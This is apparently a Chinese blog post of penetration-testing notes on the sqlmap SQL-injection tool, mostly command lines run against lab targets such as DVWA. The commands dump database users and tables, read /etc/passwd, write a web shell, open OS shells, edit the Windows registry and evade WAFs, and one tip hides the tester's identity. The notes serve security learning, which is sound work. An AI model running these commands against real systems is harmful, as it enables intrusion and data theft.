【渗透测试笔记】之【SQLMap】

最新推荐文章于 2024-06-19 11:16:56 发布
最新推荐文章于 2024-06-19 11:16:56 发布
阅读量2.4k 收藏 9
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/107467338
版权

初探SQL Map

五种漏洞检测技术

  • 基于布尔的盲注检测
  • 基于时间的盲注检测
  • 基于错误的检测
  • 基于UNION 联合查询的检测
  • 基于堆叠查询的检测

GET

sqlmap -u "http://192.168.2.101/mutillidae/index.php?page=user-info.php&username=a&password=a&user-info-php-submit-button=View+Account+Details" -p username -f

-p:检查哪个参数
-f:检查数据库指纹(fingerprint)
–user:查看数据库的用户
–banner:查看banner 信息
–dbs:查询数据库
–schema:查看元数据库
-a:全查
日志路径:.local/share/sqlmap/output/

  • 如果知道账号密码可以直接连接查询:
sqlmap -d "mysql://user:password@192.168.2.101:3306:dvwa" -f --users
  • 检测多个url
sqlmap -m list.txt --dbs
  • 利用谷歌
sqlmap -g "inurl:\"http:www.test.com\index.php?id=1\""

POST

  • 使用Burp保存请求文件post.txt
sqlmap -r post.txt --dbs
  • 使用Burp 到Project options-Misc-Logging-Proxy-勾选Requests,保存到log.txt
sqlmap -l log.txt

HTTPS

sqlmap -u "URL" --force-ssl

详解

Request

数据段:–data

get/post 都适用

GET:

sqlmap -u "http://192.168.2.102/mutillidae/index.php" --data="page=user-info.php&username=a&password=a&user-info-php-submit-button=View+Account+Details" -p username --dbs

POST:

sqlmap -u "http://192.168.2.101/mutillidae/index.php?page=login.php" --data="username=a&password=a&login-php-submit-button=Login" -f
  • 指定变量分隔符:–param-del
sqlmap -u "http://1.1.1.1/a.php" --data="user=a;password=b" --param-del=";" -f

身份认证

如果想要检查Cookie 中的注入点,level>=2:
–level=2

  • 基于Cookie
sqlmap -u "http://192.168.2.102/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit" --cookie="security=low; PHPSESSID=cbafbc5dfd1dd801b2910c7931e8ba96" --dbs

set-cookie/--drop-set-cookie/-cookie-del
  • 基于HTTP 协议
    Basic/Digest/NTLM
--auth-type Basic/Digest/NTLM --auth-cred "user:pass"
  • 基于客户端证书
--auth-file="ca.PEM"

USER-AGENT

如果想要检查user-agent 中的注入点,level>=3:
–level=3
尽量不要使用默认user-agent,会暴露身份

--user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
--random-agent

Host:–host

如果想要检查user-agent 中的注入点,level=5:
–level=5

Referer:–referer

如果想要检查user-agent 中的注入点,level>=3:
–level=3

自定义 header:–headers

每个头单独一行(\n)(严格名称区分大小写

--headers="Host:xxx\nUser-Agent:xxx"

指定方法:–method

--method=GET/POST

代理

--proxy="1.1.1.1:8080"
--proxy-cred="name:pass"  # 认证代理(如果需要)
--ignore-proxy  # 忽略系统代理,通常用于扫描本地目标

利用配置文件扫描

sqlmap -c sqlmap.config

Injection

指定或排除注入点(伪静态页面注入方法)

  • 指定注入点:-p
    会使level 失效
-p "user-agent,referer"

对于特殊变量,在变量后加*(伪静态页面注入方法)

sqlmap -u "http://www.test.com/param1/value1*/param2/value2"
  • 排除注入点:–skip
--level=5 --skip="id,user-agent"

指定数据库或系统

用于已经在信息收集时发现了数据库版本或操作系统信息:

--dbms "mysql"
--dbms "mysql <5.0>"

--os="linux"
--os="windows"

使数值失效方法

默认失效方法为取负值,即id=1变为id=-1

  • 大数值失效
--invalid-bignum
  • 布尔失效
--invalid-logical

需要闭合的前后缀

–prefix/–suffix

--prefix"')" --suffix"AND ('a'='a'"

后端sql语句

select * from user where id=('1') <PAYLOAD> AND('a'='a') limit 0,1

绕过应用层过滤、IPS、WAF

脚本路径:/usr/share/sqlmap/tamper/xxx

--tamper="a.py,b.py,c.py"

sqlmap -u "http://1.1.1.1/a.php?id=1" --tamper="base64encode.py,randomcase.py"

Detection

扫描等级及风险

  • level
    1-5级(默认1)
  • risk
    1-4(默认1)
    risk升高可能造成数据破坏

盲注时判断依据

–string(包含字符串),–not-string(不包含字符串),–regexp(正则表达式),
–code(响应代码)
–text-only,–titles(title)

Techniques

指定列数

--union-cols 6-9

另一个页面体现出的sql注入

--second-order http://1.1.1.1/b.php

指纹及banner

-f/–fingerprint
–banner

Enumeration

–batch(都执行默认选项)

--hostname  # 主机名

--current-user  # 当前数据库管理账号
--users  # 数据库的所有账号

--privileges  # 查询所有用户权限
--privileges-CU  # 查询当前用户权限
--privileges-U username  # 查询指定用户权限

--current-db  # 查询当前数据库
--dbs  # 查询所有数据库
--exclude-sysdbs  # 不显示系统数据库

-D dvwa --tables  # 查指定数据库的表
-D dvwa -T users --columns  # 查询指定表的字段
-D dvwa -T users --count  # 有多少条记录
-D dvwa -T users --dump  # 查记录
-D dvwa -T users --dump --start 1 --stop 2  # 查询第1,2条

--sql-query "select * from users"  # 自定义sql 语句

Brute force

当无法查看information_schema数据库时,通过暴力破解

--common-tables
--common-columns

微软的ACCESS 数据库无表无列

File system acces

读取文件

--file-read="/etc/passwd"

写文件

--file-write="shell.php" --file-dest"/tmp/shell.php"
# shell.php为本机当前目录文件

Operating system access

获取shell

--os-cmd
--os-shell
--sqlshell

Windows registry access

--reg-read
--reg-add
--reg-del
--reg-key
--reg-value
--reg-data
--reg-type

sqlmap -u "http://1.1.1.1/q.aspx?id=1" --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

General

指定保存位置和输出路径

-s  # 会话文件保存位置
-t  # 流量文件保存位置
--output-dir=/tmp

字符编码

--charset=GBK

爬取深度

--crawl=3

自定义保存分割符

--cvs-del=";"

清空session(sqlmap缓存)

--flush-session

--fresh-queries  # 本次重查

HTTPS

--force-ssl

以十六进制传输

--hex

分析报错信息

--parse-errors

Miscellaneous

检查WAF/IPS/IDS和绕过

--check-waf
--identify-waf  # 彻底检查

--hpp  # 对ASP/IIS有效

模拟智能手机

--mobile  # 修改useragent

清空文件夹

purge-output:清除文件

向导方式

sqlmap --wizard
AA8j
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap基础学习(笔记
部分学习记录
07-30 1205
此文为自己学习sqlmap基础的笔记,留个痕迹,便于以后复习查询 #sqlmap获取目标 python sqlmap --version python sqlmap -h python sqlmap -hh #sqlmap直连数据库 ##服务型数据库(MySQL、Oracle、Microsoft SQL Server、PostqreSQL etc) DBMS://USER:PASSWORD@DBMS_IP/PORT/DATABASE_NAME 例如:python sqlmap.py -d “mysql://
sqlmap批量扫描burpsuite请求日志记录
dieman0446的博客
06-23 949
sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQL注入漏洞进行地毯式的扫描。 扫描方式通常有windows扫描与linux扫描两种。 一、Windows下扫描配置 1.配置burpsuite下记录所有的request记录,并...
【转】sqlmap用户手册
weixin_33851177的博客
06-18 1245
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页...
删除sqlmap的缓存
最新发布
2301_77513384的博客
06-19 233
清楚kali,sqlmap的缓存
sqlmap
m0_50624936的博客
08-12 490
所谓SQL注入,就是通过把SQL命令插入到web表单提交或者输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,他是利用现有应用程序,将恶意的SQL命令注入到后台数据库引擎执行的能力,它可以通过在web表单中输入恶意SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。由此可见:SQL注入发生位置可以是http数据包的任意位置在某些情况下,只有当用户提供要附加到注入负载的特定后缀时,易受攻击的参数才可被利用。
sqlmap命令大全(附详细扫描流程)
m0_50818626的博客
05-24 7364
3.扫描指定数据库中的所有表名,-D可以指定要扫描的数据库,这里我扫的是security库。红框内就是我们所扫描出的字段名,一共有三个,分别为id,password,username。如上图所示,我们就把我们需要的username和password找出来啦!4.扫描users中的字段名是什么,-T可以指定扫描的表。上图红框内就是security库中的所有表啦。可以看到有漏洞,布尔盲注和时间盲注。可以看到所有的数据库都被扫描出来了。5.用dump扫描出字段中的所有数据。2.扫描所有数据库 -dbs。
测试工具-sqlmap
weixin_42902126的博客
06-27 4288
sqlmap支持直连,通过以下命令来直连。 1、服务型数据库:mysql,oracle,sqlserver,postgresql等 服务型数据库(前提知道数据库用户名和密码): mysql数据库root账户默认不支持外链,参考文档:https://qa.1r1g.com/sf/ask/3435601921/ 2、文件型数据库:sqlite,access,firebird等 文件型数据库(前提知道数据库绝对路径): sqlmap获取目标 单一url探测 参数使用 -u 或 --url URL格式:http(s
网络安全-渗透完整笔记
03-27
网络安全中的渗透测试是一种合法的、经过授权的模拟黑客攻击行为,旨在评估并增强网络系统安全性。渗透测试通过发现和利用系统中的弱点、技术缺陷或漏洞,帮助企业和组织识别潜在的安全风险,确保网络防御机制的有效...
SQLMAP使用笔记.pdf
01-25
SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP 的使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> [options]` 其中,`-u` ...
网银渗透测试流程
07-12
【网银渗透测试流程详解】 渗透测试是一种模拟黑客攻击行为,以发现并修复系统安全漏洞的过程,尤其在金融行业中,如网银系统,其安全性至关重要。以下是对网银渗透测试流程的详细阐述: 1. **准备阶段** - **...
sqlmap使用笔记1
08-03
Sqlmap是一款强大的自动化SQL注入工具,它主要用于检测和利用SQL注入漏洞,帮助安全研究人员或渗透测试者高效地发现和利用数据库中的敏感信息。本篇笔记将深入探讨sqlmap的使用方法和功能,涵盖多个核心知识点。 1....
【推荐】最新超全的渗透测试学习基础教程集合(84份).zip
08-04
最新超全的渗透测试学习基础教程集合,新手、大佬都可以阅读: 01.入门笔记之看雪Web安全学习及异或解密示例; 02.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记; 03.Burp Suite工具安装配置、Proxy基础用法...
使用sqlmap进行日志sql注入检测
weixin_34409822的博客
11-24 1094
sqlmap可以导入webserver的日志进行查找注入点 日志需要sqlmap指定的格式sqlmap.py -l demo.log --batch --smart tips:甲方的一些动态扫描器 日志分析扫描器 可以调用sqlmap来检测注入 毕竟是神器 毕竟在更新 自己去重写检测sqlmap 也不一定写的有sqlmap这么完美有时间做个demo出来 记录下。vi...
SQL注入-SQLmap-不同数据库注入
m0_52149675的博客
04-01 2594
SQL注入-不同数据库注入-注入工具的使用 简要学习各种数据库的注入特点 access,mysql, mssql , mongoDB,postgresql, sqlite,oracle,sybase等
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
热门推荐
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
Sqlmap入侵日志审计
qq_45521281的博客
05-01 1980
例题1.——bugku日志审计 本题要点:sql盲注、python脚本编写、python正则表达式 先下载压缩包,解压发现里面是一个 access.log 日志文件。 全选后在网上URL解码: 复制回notepad++中 这样看起来就方便多了。(或者全选,插件—>MIME Tools—>URL Decode) 接下来开始分析。 1.测试有没有注入漏洞 这理就是开始测试有没有sq...
kali sqlmap 默认扫描数据的保存路径
m0_61867082的博客
06-04 1240
/root/.local/share/sqlmap/output/
溯源(二)之 windows-还原攻击路径
A_991128a的博客
04-10 1136
我们可以通过这些敏感id去排查攻击者的一些操作,攻击者通过一些web漏洞,控制了我们的主机,那他会不会进行一些远程登录,或者是创建一些用户,留下一些后门,这些我们都可以通过Windows的安全日志去查看,我们在护网中,如果去溯源出了攻击者留下的账号或者后门,那这也是溯源的一部分,同时也是加分项,在日常的应急响应中,也需要我们去排查,排查攻击者对服务器做的一些权限维持等操作,我们需要去排查并清理这些出权限维持。这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。
数据库渗透测试SQLMAP适用
06-08
SQLMAP是一个自动化的数据库渗透测试工具,主要是用于检测和利用Web应用程序中的SQL注入漏洞。它可以自动探测目标网站是否存在SQL注入漏洞,然后利用这些漏洞获取目标数据库的敏感数据。因此,SQLMAP非常适用于数据库渗透测试。不过,在实际使用中,需要注意合法性问题,遵守法律法规,不得进行非法操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值